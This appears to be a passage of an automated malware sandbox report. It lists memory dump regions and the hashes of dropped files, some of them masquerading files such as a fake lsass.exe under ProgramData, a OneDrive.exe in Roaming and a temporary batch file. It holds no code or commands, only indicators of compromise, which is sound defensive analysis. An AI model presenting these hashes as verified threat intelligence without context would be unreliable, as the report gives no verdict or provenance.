memory/228-262-0x0000000000780000-0x0000000000BA0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e626cd189fa4b090d16e04149911c607
SHA1 86f93d8dae0f98f19c2ca0c820f2131489f72339
SHA256 0c172445195add1b1b1f2d9b89f421ece21314a4a62c41922edaaac14c98c5e1
SHA512 ec8ce22f8184c10f3cd0011cfbc510dff68521fb421c641d443a1f40fdd7615cb0a9ec400129c7fed3df4bd5852fab7e2c0da72cc57b08c7482dfe2f393a889e

memory/1060-273-0x000002922B700000-0x000002922B710000-memory.dmp

memory/1060-274-0x000002922B700000-0x000002922B710000-memory.dmp

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/228-291-0x0000000000780000-0x0000000000BA0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lsass.exe.log

MD5 24cfd42a8de70b38ed70e1f8cf4eda1c
SHA1 e447168fd38da9175084b36a06c3e9bbde99064c
SHA256 93b740416114e346878801c73e8a8670ff1390d3fa009424b88fafe614a3c5cd
SHA512 5c2daf5328ba99d750e9d0362e84f3a79b7fc8395aa8aa2bc1a01b266583fe1f8352bf0619f985aa72223412d14afa054537739b4941610a1d0f96e7fee2a875

memory/3172-293-0x00000000006A0000-0x0000000000AC0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp12AD.tmp.bat

MD5 797b07c881f4fb3dfa8e8790c0127341
SHA1 5433e3aad745b66b620cf46ad1d19e1157e9eeaa
SHA256 328be908af085d8dc109ac07642e2ba914ba9605a16ace34ad13ed3be4d8219e
SHA512 900c5985173920407deb97fbb2c40f4f1daa4ece34ffe1be1fdddcfffd53b367625834db9cf87a21f793f0daa599f88c006b64f81b4dd3d431128e906d9f43c1

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/3172-297-0x00000000006A0000-0x0000000000AC0000-memory.dmp

memory/484-299-0x00007FF6FB680000-0x00007FF6FC04A000-memory.dmp

memory/3036-300-0x00000183757D0000-0x00000183757F0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8b5d3a2c2b26ac36b88cf03dd0a32fa9
SHA1 a9122eb088176912311fc0f8eb0b8f020693d259
SHA256 8a11a416df1c3ef93ee65773a43d84cdec960e9d551fcb0a4351fc15f1d0ff52
SHA512 47e0f4eddc7e7323988597ac5fcf7c7ea15a9999667e07d6cc422fb072a5d2e0c5501a11db8b4f5e8a0f380a85ef0a60f9a201ed30f80b104b825bfe8d60a7c6

memory/3172-303-0x0000000003EE0000-0x0000000003EEA000-memory.dmp

memory/3036-304-0x0000018375810000-0x0000018375850000-memory.dmp

memory/4352-305-0x0000000000400000-0x000000000083B000-memory.dmp

memory/3172-306-0x00000000006A0000-0x0000000000AC0000-memory.dmp

memory/4740-307-0x00007FF6B5AF0000-0x00007FF6B5B19000-memory.dmp

memory/3036-308-0x00007FF7AFCC0000-0x00007FF7B04AF000-memory.dmp

memory/4352-309-0x0000000000400000-0x000000000083B000-memory.dmp

memory/3172-310-0x00000000006A0000-0x0000000000AC0000-memory.dmp

memory/4740-311-0x00007FF6B5AF0000-0x00007FF6B5B19000-memory.dmp

memory/3036-312-0x00007FF7AFCC0000-0x00007FF7B04AF000-memory.dmp

memory/4352-313-0x0000000000400000-0x000000000083B000-memory.dmp

memory/3172-314-0x00000000006A0000-0x0000000000AC0000-memory.dmp

memory/3036-316-0x00007FF7AFCC0000-0x00007FF7B04AF000-memory.dmp

memory/3036-317-0x0000018408140000-0x0000018408160000-memory.dmp

memory/4352-318-0x0000000000400000-0x000000000083B000-memory.dmp

memory/3172-319-0x00000000006A0000-0x0000000000AC0000-memory.dmp

memory/3036-321-0x00007FF7AFCC0000-0x00007FF7B04AF000-memory.dmp

memory/4352-322-0x0000000000400000-0x000000000083B000-memory.dmp

memory/3036-323-0x0000018408140000-0x0000018408160000-memory.dmp

memory/3172-324-0x00000000006A0000-0x0000000000AC0000-memory.dmp

memory/3036-326-0x00007FF7AFCC0000-0x00007FF7B04AF000-memory.dmp

memory/4352-327-0x0000000000400000-0x000000000083B000-memory.dmp

memory/3172-328-0x00000000006A0000-0x0000000000AC0000-memory.dmp

memory/3036-330-0x00007FF7AFCC0000-0x00007FF7B04AF000-memory.dmp

memory/4352-331-0x0000000000400000-0x000000000083B000-memory.dmp

memory/3172-332-0x00000000006A0000-0x0000000000AC0000-memory.dmp

memory/3036-334-0x00007FF7AFCC0000-0x00007FF7B04AF000-memory.dmp

memory/4352-335-0x0000000000400000-0x000000000083B000-memory.dmp

memory/3172-336-0x00000000006A0000-0x0000000000AC0000-memory.dmp

memory/3036-338-0x00007FF7AFCC0000-0x00007FF7B04AF000-memory.dmp

memory/4352-339-0x0000000000400000-0x000000000083B000-memory.dmp

memory/3172-340-0x00000000006A0000-0x0000000000AC0000-memory.dmp

memory/3036-342-0x00007FF7AFCC0000-0x00007FF7B04AF000-memory.dmp

memory/4352-343-0x0000000000400000-0x000000000083B000-memory.dmp

memory/3172-344-0x00000000006A0000-0x0000000000AC0000-memory.dmp

memory/3036-346-0x00007FF7AFCC0000-0x00007FF7B04AF000-memory.dmp

memory/4352-347-0x0000000000400000-0x000000000083B000-memory.dmp

memory/3172-348-0x00000000006A0000-0x0000000000AC0000-memory.dmp

memory/3036-350-0x00007FF7AFCC0000-0x00007FF7B04AF000-memory.dmp

memory/4352-351-0x0000000000400000-0x000000000083B000-memory.dmp

memory/4352-352-0x0000000004910000-0x0000000004911000-memory.dmp

memory/3172-353-0x00000000006A0000-0x0000000000AC0000-memory.dmp

memory/3036-355-0x00007FF7AFCC0000-0x00007FF7B04AF000-memory.dmp